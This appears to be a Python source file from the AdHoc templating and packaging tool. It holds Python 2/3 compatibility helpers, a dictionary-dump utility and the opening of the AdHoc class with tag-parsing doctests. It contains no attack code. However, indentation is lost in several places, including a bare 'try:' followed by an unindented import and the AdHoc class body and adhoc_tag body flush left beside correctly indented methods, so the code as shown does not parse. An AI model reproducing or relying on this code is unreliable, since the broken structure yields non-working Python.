# template section.
#
# It is exported as ``rt_adhoc.py`` during export.
#
# Macros
# ------
#
# Macros are defined programmatically::
#
# AdHoc.macros[MACRO_NAME] = EXPANSION_STRING
#
# A macro is invoked by enclosing a MACRO_NAME in
# :attr:`adhoc.AdHoc.macro_call_delimiters`. (Default: |@m|, |m>|).
#
# :|MACRO_NAME|:
# Macro call.
#
# Internal
# --------
#
# :|adhoc_run_time_class|:
# Marks the beginning of the run-time class. This is only
# recognized in the *AdHoc* program/module.
#
# :|adhoc_run_time_section|:
# All sections are concatenated and used as run-time code. This is
# only recognized in the *AdHoc* program/module.
#
# In order to preserve the ``xsource_i === source_i`` bijective
# condition, macros are expanded/collapsed with special macro
# definition sections. (See :attr:`adhoc.AdHoc.macro_xdef_delimiters`;
# Default: |<m|, |m@|).
#
# :|adhoc_macro_call|:
# Macro call section.
#
# :|adhoc_macro_expansion|:
# Macro expansion section.
#
# @:adhoc_template:@ doc/index.rst # off
# @:adhoc_uncomment:@
# @:adhoc_uncomment:@
# @:adhoc_template:@ doc/index.rst
# @:adhoc_index_only:@
#
# .. include:: USE_CASES.txt
# @:adhoc_index_only:@
#
# AdHoc Script
# ============
# @:adhoc_index_only:@
#
# .. automodule:: adhoc
# :members:
# :show-inheritance:
#
# .. _namespace_dict:
#
# NameSpace/NameSpaceDict
# =======================
#
# .. automodule:: namespace_dict
# :members:
# :show-inheritance:
#
# @:adhoc_index_only:@
# @:adhoc_template:@ doc/index.rst # off
# @:adhoc_uncomment:@
# @:adhoc_uncomment:@
# @:adhoc_template:@ doc/index.rst
#
# .. |adhoc_self| replace:: |@:|\ ``adhoc_self``\ |:@|
# .. |adhoc_include| replace:: |@:|\ ``adhoc_include``\ |:@|
# .. |adhoc_verbatim| replace:: |@:|\ ``adhoc_verbatim``\ |:@|
# .. |adhoc_compiled| replace:: |@:|\ ``adhoc_compiled``\ |:@|
# .. |adhoc_enable| replace:: |@:|\ ``adhoc_enable``\ |:@|
# .. |adhoc_disable| replace:: |@:|\ ``adhoc_disable``\ |:@|
# .. |adhoc_template| replace:: |@:|\ ``adhoc_template``\ |:@|
# .. |adhoc_template_v| replace:: |@:|\ ``adhoc_template_v``\ |:@|
# .. |adhoc_uncomment| replace:: |@:|\ ``adhoc_uncomment``\ |:@|
# .. |adhoc_indent| replace:: |@:|\ ``adhoc_indent``\ |:@|
# .. |adhoc_import| replace:: |@:|\ ``adhoc_import``\ |:@|
# .. |adhoc_unpack| replace:: |@:|\ ``adhoc_unpack``\ |:@|
# .. |adhoc_remove| replace:: |@:|\ ``adhoc_remove``\ |:@|
# .. |adhoc_remove_| replace:: |@:|\ ``adhoc_remove_``\ |:@|
# .. |adhoc_run_time_class| replace:: |@:|\ ``adhoc_run_time_class``\ |:@|
# .. |adhoc_run_time_section| replace:: |@:|\ ``adhoc_run_time_section``\ |:@|
# .. |adhoc_run_time_engine| replace:: |@:|\ ``adhoc_run_time_engine``\ |:@|
# .. |@m| replace:: ``@|:``
# .. |m>| replace:: ``:|>``
# .. |<m| replace:: ``<|:``
# .. |m@| replace:: ``:|@``
# .. |MACRO_NAME| replace:: |@m|\ ``MACRO_NAME``\ |m>|
# .. |adhoc_macro_call| replace:: |<m|\ ``adhoc_macro_call``\ |m@|
# .. |adhoc_macro_expansion| replace:: |<m|\ ``adhoc_macro_expansion``\ |m@|
#
# @:adhoc_template:@ doc/index.rst # off
# @:adhoc_uncomment:@
# --------------------------------------------------
# |||:sec:||| COMPATIBILITY
# --------------------------------------------------
import sys
# (progn (forward-line 1) (snip-insert-mode "py.b.printf" t) (insert "\n"))
# Portable `printf`: resolve a print *function* usable on Python 2.4 - 3.x.
# adapted from http://www.daniweb.com/software-development/python/code/217214
try:
    # Python 3: `print` is already a function; `eval` avoids a
    # SyntaxError when this file is merely parsed by Python 2.
    printf = eval("print") # python 3.0 case
except SyntaxError:
    printf_dict = dict()
    try:
        # Python 2.6/2.7: enable the print function via __future__.
        exec("from __future__ import print_function\nprintf=print", printf_dict)
        printf = printf_dict["printf"] # 2.6 case
    except SyntaxError:
        def printf(*args, **kwd): # 2.4, 2.5, define our own Print function
            # Minimal print() substitute honoring the `file`, `sep`
            # and `end` keyword arguments.
            fout = kwd.get("file", sys.stdout)
            w = fout.write
            if args:
                w(str(args[0]))
                sep = kwd.get("sep", " ")
                for a in args[1:]:
                    w(sep)
                    w(str(a))
            w(kwd.get("end", "\n"))
    del printf_dict
# (progn (forward-line 1) (snip-insert-mode "py.f.isstring" t) (insert "\n"))
# hide from 2to3
# The exec() hides `basestring` from the 2to3 conversion tool.
exec('''
def isstring(obj):
    return isinstance(obj, basestring)
''')
try:
    isstring("")
except NameError:
    # Python 3: no `basestring`; accept both str and bytes.
    def isstring(obj):
        return isinstance(obj, str) or isinstance(obj, bytes)
# (progn (forward-line 1) (snip-insert-mode "py.b.dict_items" t) (insert "\n"))
# Portable dict iterators: use the Python 2 iter* methods when present.
try:
    getattr(dict(), 'iteritems')
    ditems = lambda d: getattr(d, 'iteritems')()
    dkeys = lambda d: getattr(d, 'iterkeys')()
    dvalues = lambda d: getattr(d, 'itervalues')()
except AttributeError:
    ditems = lambda d: getattr(d, 'items')()
    dkeys = lambda d: getattr(d, 'keys')()
    dvalues = lambda d: getattr(d, 'values')()
import os
import re
# --------------------------------------------------
# |||:sec:||| CONFIGURATION
# --------------------------------------------------
# Debug output defaults (comment prefix, tag width, field width).
# Pre-existing globals win, so an embedding script can override them
# before this module body runs.
dbg_comm = ((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# '))
dbg_twid = ((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9))
dbg_fwid = ((('dbg_fwid' in globals()) and (globals()['dbg_fwid'])) or (23))
# (progn (forward-line 1) (snip-insert-mode "py.b.dbg.setup" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.strings" t) (insert "\n"))
def _uc(string): # ||:fnc:||
    # Python 2 spelling: decode a UTF-8 byte string to unicode.
    return unicode(string, 'utf-8')
try:
    _uc("")
except NameError:
    # Python 3: `unicode` does not exist; str is already unicode.
    _uc = lambda x: x
# The effective unicode text type of the running interpreter.
uc_type = type(_uc(""))
def uc(value): # ||:fnc:||
    '''Coerce `value` to unicode; non-strings pass through unchanged.'''
    needs_decode = isstring(value) and not isinstance(value, uc_type)
    return _uc(value) if needs_decode else value
def _utf8str(string): # ||:fnc:||
    '''Encode a unicode string as UTF-8; anything else passes through.'''
    if not isinstance(string, uc_type):
        return string
    return string.encode('utf-8')
def utf8str(value): # ||:fnc:||
    '''UTF-8 encode `value` if it is a string, else return it as is.'''
    return _utf8str(value) if isstring(value) else value
def _nativestr(string): # ||:fnc:||
    '''Convert `string` to the native ``str`` type of this interpreter.'''
    # for python3, unicode strings have type str
    if isinstance(string, str):
        return string
    # for python2, encode unicode strings to utf-8 strings
    if isinstance(string, uc_type):
        return string.encode('utf-8')
    try:
        # byte string on Python 3: decode; keep as-is if not valid UTF-8
        return str(string.decode('utf-8'))
    except UnicodeDecodeError:
        return string
def nativestr(value): # ||:fnc:||
    '''Return `value` with strings converted to the native str type.'''
    return _nativestr(value) if isstring(value) else value
# (progn (forward-line 1) (snip-insert-mode "py.f.strclean" t) (insert "\n"))
def strclean(value):
    '''Make a copy of any structure with all strings converted to
    native strings.
    :func:`strclean` is good for :meth:`__str__` methods.
    It is needed for doctest output that should be compatible with
    both python2 and python3.
    The output structure is not necessarily an exact copy of the input
    structure, since objects providing iterator or item interfaces are
    only copied through those!
    '''
    if isstring(value):
        return _nativestr(value)
    if hasattr(value, 'items'):
        # mapping-like: copy key/value pairs through strclean
        try:
            out = type(value)()
        except Exception:
            (t, e, tb) = sys.exc_info() # |:debug:|
            # local import: `traceback` is not imported in this section
            import traceback
            printf(''.join(traceback.format_tb(tb)), file=sys.stderr)
            printe('OOPS: ' + t.__name__ + ': ' + str(e) + ' [' + str(value.__class__.__name__) + '] [' + str(value) + ']')
            # Fall back to a plain dict -- previously `out` stayed
            # unbound here and the loop below died with a NameError.
            out = dict()
        for k, v in value.items():
            out[strclean(k)] = strclean(v)
        return out
    if hasattr(value, '__iter__') or hasattr(value, 'iter'):
        # sequence-like: copy elements; tuples are rebuilt from a list
        if isinstance(value, tuple):
            out = []
        else:
            out = type(value)()
        for e in value:
            out.append(strclean(e))
        if isinstance(value, tuple):
            out = type(value)(out)
        return out
    return value
# (progn (forward-line 1) (snip-insert-mode "py.f.issequence" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.logging" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.ordereddict" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.pyramid.activate" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.project.libdir" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.sql.alchemy" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.main.sql.ws" t) (insert "\n"))
# The standard template should be something useful
# @:adhoc_uncomment:@
# @:adhoc_template:@ -
# # @:adhoc_disable:@ allow modification of exploded sources in original place
sys.path.append('__adhoc__')
# # @:adhoc_disable:@
# @:adhoc_template:@
# @:adhoc_uncomment:@
# @:adhoc_run_time:@
# @:adhoc_template:@ -
# @:adhoc_run_time:@ The run-time class goes here
# @:adhoc_run_time_engine:@ settings enabled at run-time
# @:adhoc_enable:@
# # RtAdHoc.flat = False
# # @:adhoc_template:@
# RtAdHoc.flat = False
# # @:adhoc_template:@ -
# @:adhoc_enable:@
# @:adhoc_run_time_engine:@
#import adhoc # @:adhoc:@
# @:adhoc_template:@
# (progn (forward-line 1) (snip-insert-mode "py.b.sformat" t) (insert "\n"))
# Portable `sformat`: str.format on modern Pythons, the external
# `stringformat` package as a fallback for Python < 2.6.
try:
    ('{0}').format(0)
    def sformat (fmtspec, *args, **kwargs):
        return fmtspec.format(*args, **kwargs)
except AttributeError:
    try:
        import stringformat
    except ImportError:
        try:
            import stringformat_local as stringformat # @:adhoc:@
        except ImportError:
            printf('error: (adhoc) stringformat missing.'
                   ' Try *easy_install stringformat*.', file=sys.stderr)
            exit(1)
    def sformat (fmtspec, *args, **kwargs):
        return stringformat.FormattableString(fmtspec).format(
            *args, **kwargs)
import base64
import urllib
#import something.non.existent # @:adhoc:@
try:
import namespace_dict
except ImportError:
import namespace_dict # @:adhoc:@
# copy of ws_prop_dict.dict_dump
def dict_dump(dict_, wid=0, trunc=0, commstr=None, tag=None, out=None): # ||:fnc:||
    '''Dump a dictionary.
    :param dict_: dictionary to dump.
    :param wid: maximum width of a value line (0 = auto, minimum 50).
    :param trunc: if > 0, keep at most that many lines per value.
    :param commstr: comment prefix (default: global ``dbg_comm`` or "# ").
    :param tag: marker for the tag column (default ":DBG:").
    :param out: output stream (default: ``sys.stderr``).
    '''
    if out is None:
        out = sys.stderr
    if commstr is None:
        commstr = ((('dbg_comm' in globals()) and (globals()['dbg_comm'])) or ('# '))
    dbg_twid = ((('dbg_twid' in globals()) and (globals()['dbg_twid'])) or (9))
    if tag is None:
        tag = ':DBG:'
    # key column width: widest key, but at least the global dbg_fwid
    max_wid = 0
    for key in dict_.keys():
        _wid = len(key)
        if max_wid < _wid:
            max_wid = _wid
    dbg_fwid = ((('dbg_fwid' in globals()) and (globals()['dbg_fwid'])) or (max_wid))
    if dbg_fwid < max_wid:
        dbg_fwid = max_wid
    printf(sformat('{0}{1}', commstr, '-' * 30), file=out)
    # continuation-line prefix aligned with the value column
    indent = (sformat("{0}{3:^{1}} {4:<{2}s}: ",
                      commstr, dbg_twid, dbg_fwid,
                      '', ''))
    for key, value in sorted(dict_.items()):
        # escape control characters so each value stays on one line
        value = str(value)
        value = value.replace('\n', '\\n')
        value = value.replace('\r', '\\r')
        value = value.replace('\t', '\\t')
        value = value.replace('\f', '\\f')
        if wid == 0:
            wid = 78 - len(indent) - 1
        if wid < 50:
            wid = 50
        # word-wrap the value at `wid`, preferring the last space
        start = 0
        limit = len(value)
        value_lines = []
        while start < limit:
            line = value[start:start+wid]
            space_pos = wid - 1
            if len(line) == wid:
                space_pos = line.rfind(' ')
                if space_pos > 0:
                    line = line[:space_pos + 1]
                else:
                    space_pos = wid - 1
            value_lines.append(line)
            start += space_pos + 1
        if trunc > 0:
            value_lines = value_lines[:trunc]
            value_lines[-1] = sformat('{0}[', value_lines[-1])
        # NOTE(review): an empty value produces no value_lines, so
        # value_lines[0] below would raise IndexError -- confirm values
        # are never empty strings here.
        printf(sformat("{0}{3:^{1}} {4:<{2}s}: ]{5!s}",
                       commstr, dbg_twid, dbg_fwid,
                       tag, key, value_lines[0]), file=out)
        for line in value_lines[1:]:
            printf(sformat('{0}{1}',indent, line), file=out)
def dump_attr(obj, wid=0, trunc=0, commstr=None, # ||:fnc:||
              tag=None, out=None):
    '''Dump the attributes (``vars``) of `obj` via :func:`dict_dump`.'''
    out = sys.stdout if out is None else out
    dict_dump(vars(obj), wid=wid, trunc=trunc,
              commstr=commstr, tag=tag, out=out)
printe = printf  # error-print alias: same signature/behavior as printf
# (progn (forward-line 1) (snip-insert-mode "py.b.posix" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.os.system.sh" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.prog.path" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.b.line.loop" t) (insert "\n"))
# --------------------------------------------------
# |||:sec:||| CLASSES
# --------------------------------------------------
# (progn (forward-line 1) (snip-insert-mode "py.c.placeholder.template" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.c.key.hash.ordered.dict" t) (insert "\n"))
# (progn (forward-line 1) (snip-insert-mode "py.c.progress" t) (insert "\n"))
# --------------------------------------------------
# |||:sec:||| EXCEPTION
# --------------------------------------------------
class AdHocError(Exception): # ||:cls:||
    '''Error raised for AdHoc compilation/processing failures.'''
    pass
# --------------------------------------------------
# |||:sec:||| ADHOC
# --------------------------------------------------
# @:adhoc_run_time_section:@ START
import sys
import os
import re
# @:adhoc_uncomment:@
# @:adhoc_template:@ -catch-stdout
try:
from cStringIO import StringIO as _AdHocBytesIO, StringIO as _AdHocStringIO
except ImportError:
try:
from StringIO import StringIO as _AdHocBytesIO, StringIO as _AdHocStringIO
except ImportError:
from io import BytesIO as _AdHocBytesIO, StringIO as _AdHocStringIO
# @:adhoc_template:@
# @:adhoc_uncomment:@
# @:adhoc_run_time_section:@ off
if not hasattr(os.path, 'relpath'):
    # Backport of os.path.relpath for Python versions without it (< 2.6).
    def relpath(path, start=os.curdir):
        """Return a relative version of a path"""
        if not path:
            raise ValueError("no path specified")
        start_list = os.path.abspath(start).split(os.sep)
        path_list = os.path.abspath(path).split(os.sep)
        # Work out how much of the filepath is shared by start and path.
        i = len(os.path.commonprefix([start_list, path_list]))
        rel_list = [os.pardir] * (len(start_list)-i) + path_list[i:]
        if not rel_list:
            return os.curdir
        return os.path.join(*rel_list)
    os.path.relpath = relpath
    del relpath
# Sample tagged source used by the doctests to exercise tag parsing.
AH_CHECK_SOURCE = '''\
not in section
# >:cmd:< arg0 arg1 # comment
# <:tag:> on
in section
# >:cmd:< arg2 arg3 # comment
in section
# <:tag:> off
not in section
# <:tag2:> on
in section
in section
# <:tag2:> off
not in section
'''
# @:adhoc_run_time_section:@ on
# @:adhoc_run_time_class:@
class AdHoc(object): # |||:cls:|||
# @:adhoc_run_time_section:@ off
"""
:class:`AdHoc` is mainly used as a namespace, which is partially
included verbatim as :class:`RtAdHoc` in the generated output.
It is only instantiated for compiling adhoc output
(:meth:`compileFile`, :meth:`compile`).
**Attributes**
The following class attrbutes determine the operation of AdHoc:
- :attr:`line_delimiters`
- :attr:`section_delimiters`
- :attr:`template_process_hooks`
- :attr:`extra_templates`
- :attr:`export_dir`
- :attr:`extract_dir`
- :attr:`flat`
- :attr:`frozen`
- :attr:`quiet`
- :attr:`verbose`
- :attr:`debug`
Run-time class attributes can be set like this:
| # |adhoc_run_time|
| # |adhoc_enable|
| # RtAdHoc.flat = False
| # RtAdHoc.frozen = True
| # |adhoc_enable|
or like this:
| # |adhoc_run_time|
| if 'RtAdHoc' in globals():
| RtAdHoc.flat = False
| RtAdHoc.frozen = True
**Low-Level Functions**
:meth:`adhoc_tag` constructs a delimited tag or tag regular
expression:
>>> adhoc_tag = AdHoc.adhoc_tag
>>> delimiters = ('<:', ':>')
>>> tag_sym = 'my_tag'
>>> adhoc_tag(tag_sym, delimiters)
'<:my_tag:>'
>>> tag_rx = 'my_[^:]+'
>>> adhoc_tag(tag_rx, delimiters, is_re=True)
'\\\\<\\\\:my_[^:]+\\\\:\\\\>'
:meth:`tag_split` splits a string into tagged line parts and
untagged parts.
:meth:`adhoc_parse_line` splits a tagged line into a tag symbol and
additional arguments:
>>> adhoc_parse_line = AdHoc.adhoc_parse_line
>>> tagged_line = 'anything # <:my_tag:> additonal arguments # end comment'
>>> adhoc_parse_line(tagged_line, tag_sym, delimiters)
('my_tag', 'additonal arguments # end comment')
>>> adhoc_parse_line(tagged_line, tag_rx, delimiters, is_re=True)
('my_tag', 'additonal arguments # end comment')
>>> adhoc_parse_line(tagged_line, tag_rx, delimiters, is_re=True, strip_comment=True)
('my_tag', 'additonal arguments')
**Low-Level Convenience Functions**
*Tag Generation*
:meth:`line_tag`, :meth:`section_tag`
>>> class ah(AdHoc):
... line_delimiters = ('>:', ':<')
... section_delimiters = ('<:', ':>')
>>> ah.line_tag('tag-symbol')
'>:tag-symbol:<'
>>> ah.line_tag('tag.?rx', True)
'\\\\>\\\\:tag.?rx\\\\:\\\\<'
>>> ah.section_tag('tag-symbol')
'<:tag-symbol:>'
>>> ah.section_tag('tag.?rx', True)
'\\\\<\\\\:tag.?rx\\\\:\\\\>'
*Tagged Line/Section Retrieval*
:meth:`tag_lines`, :meth:`tag_partition`, :meth:`tag_sections`
>>> source = AH_CHECK_SOURCE
>>> line_tag = ah.line_tag('cmd')
>>> tagged_lines = ah.tag_lines(source, line_tag)
>>> adhoc_dump_list(tagged_lines, 40)
# :DBG: elt[0] : ]'# >:cmd:< arg0 arg1 # comment\\n'[
# :DBG: elt[1] : ]'# >:cmd:< arg2 arg3 # comment\\n'[
>>> is_re = True
>>> section_tag_rx = ah.section_tag('tag.?', is_re=is_re)
>>> body, sections = ah.tag_partition(source, section_tag_rx, is_re=is_re)
>>> adhoc_dump_list(body, 40)
# :DBG: elt[0] : ]'not in section\\n# >:cmd:< arg0 arg1 # ...'[
# :DBG: elt[1] : ]'not in section\\n'[
# :DBG: elt[2] : ]'not in section\\n'[
>>> adhoc_dump_list(sections, 40)
# :DBG: elt[0] : ]'in section\\n# >:cmd:< arg2 arg3 # comm ...'[
# :DBG: elt[1] : ]'in section\\nin section\\n'[
>>> body, sections = ah.tag_partition(source, section_tag_rx, is_re=is_re, headline=True)
>>> adhoc_dump_sections(sections, 40)
# :DBG: section[0] : ]['# <:tag:> on\\n', 'in section\\n# >:cmd:< arg2 arg3 # comm ...'][
# :DBG: section[1] : ]['# <:tag2:> on\\n', 'in section\\nin section\\n'][
>>> sections = ah.tag_sections(source, section_tag_rx, is_re=is_re, headline=True)
>>> adhoc_dump_sections(sections, 40)
# :DBG: section[0] : ]['# <:tag:> on\\n', 'in section\\n# >:cmd:< arg2 arg3 # comm ...'][
# :DBG: section[1] : ]['# <:tag2:> on\\n', 'in section\\nin section\\n'][
*Tagged Line Parsing*
- :meth:`line_tag_parse`, :meth:`line_tag_strip`
- :meth:`section_tag_parse`, :meth:`section_tag_strip`
>>> strclean(ah.line_tag_parse(tagged_lines[0], 'cmd'))
('cmd', 'arg0 arg1 # comment')
>>> strclean(ah.line_tag_strip(tagged_lines[0], 'cmd', strip_comment=True))
'arg0 arg1'
>>> strclean(ah.section_tag_parse(sections[1][0], 'tag.?', is_re=True))
('tag2', 'on')
>>> strclean(ah.section_tag_strip(sections[1][0], 'tag.?', is_re=True))
'on'
**Tagged Line/Section Transformations**
- :meth:`transform_lines`, :meth:`transform_sections`
- :meth:`line_tag_rename`, :meth:`line_tag_remove`
- :meth:`section_tag_rename`, :meth:`section_tag_remove`
- :meth:`indent_sections`
- :meth:`enable_sections`, :meth:`disable_transform`, :meth:`disable_sections`
- :meth:`remove_sections`
**IO Functions**
- :meth:`check_coding`
- :meth:`decode_source`, :meth:`encode_source`
- :meth:`read_source`, :meth:`write_source`
- :meth:`check_xfile`
- :meth:`pack_file`, :meth:`unpack_file`
**Run-Time Unpack/Import Interface**
- :meth:`unpack_`
- :meth:`import_`, :meth:`module_setup`
**Export Tools**
- :meth:`std_source_param`
- :meth:`export_source`
**Extract Interface**
- :meth:`unpack`
- :meth:`extract`
**Export Interface**
- :meth:`export__`, :meth:`export_`, :meth:`export`
**Dump Interface (Import/Unpack Substitute)**
- :meth:`dump__`, :meth:`dump_`, :meth:`dump_file`
**Macro Interface**
Naive macro expansion would violate the condition
``xsource_i === source_i``.
Here is a simple macro system which preserves the bijectivity
condition. It is quite useful for conditional templating. (See
`Use Cases`_ generator scripts).
*Limitations*
- Macro expansions are not prefixed with the current indentation
- Macros cannot be nested
*Attributes*
- :attr:`macro_call_delimiters`
Delimiters for macros, e.g.: ``@|:MACRO_NAME:|>``
- :attr:`macro_xdef_delimiters`
Delimiters for macro expansion, e.g.::
# <|:adhoc_macro_call\x3a|@
# @|:MACRO_NAME:|>
# <|:adhoc_macro_call\x3a|@
# <|:adhoc_macro_expansion\x3a|@
The macro definition ...
The macro definition ...
# <|:adhoc_macro_expansion\x3a|@
- :attr:`macros`
Macro definitions.
*Methods*
- :meth:`expand_macros`
- :meth:`has_expanded_macros`
- :meth:`activate_macros`
- :meth:`collapse_macros`
**Template Interface**
- :meth:`std_template_param`
- :meth:`get_templates`
- :meth:`template_list`, :meth:`col_param_closure`, :meth:`template_table`
- :meth:`get_named_template`
- :meth:`extract_templates`
**Template Extraction (uncompiled)**
- Expand and activate macros for uncompiled source
- Activate macros on compiled source
**Compile**
- Expand macros before compilation
**Export**
- Collapse macros on export of compiled source.
**Compilation Attributes**
- :attr:`include_path`
**Compilation Interface**
- :meth:`setup_tags`
- :meth:`strquote`
- :meth:`adhoc_run_time_sections_from_string`
- :meth:`adhoc_run_time_section_from_file`
- :meth:`adhoc_get_run_time_section`
- :meth:`prepare_run_time_section`
- :meth:`verbatim_`
- :meth:`include_`
- :meth:`encode_module_`
- :meth:`compile_`
**User API**
- :meth:`encode_include`
- :meth:`encode_module`
- :meth:`compile`
- :meth:`compileFile`
.. \\|:here:|
"""
# @:adhoc_run_time_section:@ on
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Attributes
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
line_delimiters = ('@:', ':@')
# @:adhoc_run_time_section:@ off
'''Tag delimiters for lines.'''
# @:adhoc_run_time_section:@ on
section_delimiters = ('@:', ':@')
# @:adhoc_run_time_section:@ off
'''Tag delimiters for sections.'''
# @:adhoc_run_time_section:@ on
template_process_hooks = {}
# @:adhoc_run_time_section:@ off
'''Dictionary of ``template-name, hook-function`` items.
If the name of a template section matches an item in this
dictionary, the ``hook-function`` is called::
section = hook-function(cls, section, tag, template_name)
'''
# @:adhoc_run_time_section:@ on
extra_templates = []
# @:adhoc_run_time_section:@ off
'''List of additional templates::
[(name, type), ...]
'''
# @:adhoc_run_time_section:@ on
export_dir = '__adhoc__'
# @:adhoc_run_time_section:@ off
'''Export directory (for :meth:`export`, ``--explode``).'''
# @:adhoc_run_time_section:@ on
extract_dir = '.'
# @:adhoc_run_time_section:@ off
'''Export directory (for :meth:`extract`, ``--extract``).'''
# @:adhoc_run_time_section:@ on
flat = True
# @:adhoc_run_time_section:@ off
'''If True, do not export files recursively.'''
# @:adhoc_run_time_section:@ on
forced = False
# @:adhoc_run_time_section:@ off
'''If True, allow duplicate imports.'''
# @:adhoc_run_time_section:@ on
frozen = False
# @:adhoc_run_time_section:@ off
'''If True, do not attempt to load modules from external
sources (\\|:todo:| not implemented).'''
# @:adhoc_run_time_section:@ on
quiet = False
# @:adhoc_run_time_section:@ off
'''If True, suppress warnings.'''
# @:adhoc_run_time_section:@ on
verbose = False
# @:adhoc_run_time_section:@ off
'''If True, display messages.'''
# @:adhoc_run_time_section:@ on
debug = False
# @:adhoc_run_time_section:@ off
'''If True, display debug messages.'''
# @:adhoc_run_time_section:@ on
include_path = []
# @:adhoc_run_time_section:@ off
'''Search path for include files. Only relevant during compilation.'''
# @:adhoc_run_time_section:@ on
export_need_init = {}
export_have_init = {}
extract_warn = False
# @:adhoc_run_time_section:@ off
# --------------------------------------------------
# ||:sec:|| Low-Level Functions
# --------------------------------------------------
# @:adhoc_run_time_section:@ on
    def _adhoc_string_util():
        # @:adhoc_run_time_section:@ off
        '''Define string utilities.
        - static method :meth:`isstring`
        - unicode type :attr:`uc_type`
        - static method :meth:`uc`
        Runs once at class-creation time (see the unpacking assignment
        below); the helpers adapt to Python 2 vs. Python 3.
        '''
        # @:adhoc_run_time_section:@ on
        def isstring(obj):
            return isinstance(obj, basestring)
        try:
            isstring("")
        except NameError:
            def isstring(obj):
                return isinstance(obj, str) or isinstance(obj, bytes)
        def _uc(string):
            return unicode(string, 'utf-8')
        try:
            _uc("")
        except NameError:
            _uc = lambda x: x
        uc_type = type(_uc(""))
        def uc(value):
            if isstring(value) and not isinstance(value, uc_type):
                return _uc(value)
            return value
        return staticmethod(isstring), uc_type, staticmethod(uc)
    isstring, uc_type, uc = _adhoc_string_util()  # unpack into class attributes
@staticmethod
def adhoc_tag(symbol_or_re, delimiters, is_re=False): # |:fnc:|
# @:adhoc_run_time_section:@ off
'''Make a tag from symbol_or_re and delimiters.
:param symbol_or_re: symbol string or regular expresssion.
:param delimiters: tuple of delimiter strings
``(prefix, suffix)``.
:param is_re: if True, escape the delimiters for regular
expressions.
'''
# @:adhoc_run_time_section:@ on
ldlm = delimiters[0]
rdlm = delimiters[1]
if is_re:
ldlm = re.escape(ldlm)
rdlm = re.escape(rdlm)
return ''.join((ldlm, symbol_or_re, rdlm))
    @classmethod
    def tag_split(cls, string, tag, is_re=False): # |:fnc:|
        # @:adhoc_run_time_section:@ off
        """Split string with tag line.
        :returns:
          a list of tuples with a flag and a section::
            [(is_tag, section), ... ]
        **Example**
        >>> source = AH_CHECK_SOURCE
        >>> printf(str(source), end='')
        not in section
        # >:cmd:< arg0 arg1 # comment
        # <:tag:> on
        in section
        # >:cmd:< arg2 arg3 # comment
        in section
        # <:tag:> off
        not in section
        # <:tag2:> on
        in section
        in section
        # <:tag2:> off
        not in section
        **Split on literal tag**
        >>> is_re = False
        >>> tag = AdHoc.adhoc_tag('tag', ('<:', ':>'), is_re)
        >>> parts = AdHoc.tag_split(source, tag, is_re)
        >>> adhoc_dump_sections(parts, 40)
        # :DBG: section[0] : ][False, 'not in section\\n# >:cmd:< arg0 arg1 # ...'][
        # :DBG: section[1] : ][True, '# <:tag:> on\\n'][
        # :DBG: section[2] : ][False, 'in section\\n# >:cmd:< arg2 arg3 # comm ...'][
        # :DBG: section[3] : ][True, '# <:tag:> off\\n'][
        # :DBG: section[4] : ][False, 'not in section\\n# <:tag2:> on\\nin secti ...'][
        **Split on tag regexp**
        >>> is_re = True
        >>> tag = AdHoc.adhoc_tag('tag.?', ('<:', ':>'), is_re)
        >>> parts = AdHoc.tag_split(source, tag, is_re)
        >>> adhoc_dump_sections(parts, 40)
        # :DBG: section[0] : ][False, 'not in section\\n# >:cmd:< arg0 arg1 # ...'][
        # :DBG: section[1] : ][True, '# <:tag:> on\\n'][
        # :DBG: section[2] : ][False, 'in section\\n# >:cmd:< arg2 arg3 # comm ...'][
        # :DBG: section[3] : ][True, '# <:tag:> off\\n'][
        # :DBG: section[4] : ][False, 'not in section\\n'][
        # :DBG: section[5] : ][True, '# <:tag2:> on\\n'][
        # :DBG: section[6] : ][False, 'in section\\nin section\\n'][
        # :DBG: section[7] : ][True, '# <:tag2:> off\\n'][
        # :DBG: section[8] : ][False, 'not in section\\n'][
        **Assemble section**
        >>> section = []
        >>> in_section = False
        >>> for part in parts:
        ...     if part[0]:
        ...         in_section = not in_section
        ...         continue
        ...     if in_section:
        ...         section.append(part[1])
        >>> section = ''.join(section)
        >>> printf(str(section), end='')
        in section
        # >:cmd:< arg2 arg3 # comment
        in section
        in section
        in section
        """
        # @:adhoc_run_time_section:@ on
        if not is_re:
            tag = re.escape(tag)
        # match any complete line containing the tag
        ro = re.compile(''.join(('^[^\n]*(', tag, ')[^\n]*$')), re.M)
        result = []
        last_end = 0
        string = cls.decode_source(string)
        for mo in re.finditer(ro, string):
            start = mo.start(0)
            end = mo.end(0)
            # untagged text before the tag line, then the tag line
            # including its trailing newline
            result.append((False, string[last_end:start]))
            result.append((True, string[start:end+1]))
            last_end = end+1
        result.append((False, string[last_end:]))
        return result
@classmethod
def adhoc_parse_line(cls, tagged_line, symbol_or_re=None, # |:clm:|
delimiters=None, is_re=False, strip_comment=None):
# @:adhoc_run_time_section:@ off
"""Parse a tagged line into tag-symbol and argument parts.
:returns: a tuple ``(tag-symbol, tag-arguments)``.
:param tagged_line: string to be parsed.
:param symbol_or_re: symbol string or regular expresssion to
be parsed, default is any sequence of characters except the
first character of the suffix delimiter.
:param delimiters: tuple of delimiter strings
``(prefix, suffix)``. Default is :attr:`line_delimiters`.
:param strip_comment: If True, remove trailing ``#`` comment
from arguments. Default: False.
>>> tagged_line = ' # @:' 'adhoc_test' ':@ arg1 arg2 # comment'
>>> AdHoc.adhoc_parse_line(tagged_line)
('adhoc_test', 'arg1 arg2 # comment')
>>> AdHoc.adhoc_parse_line(tagged_line, 'adhoc_.*', is_re=True)
('adhoc_test', 'arg1 arg2 # comment')
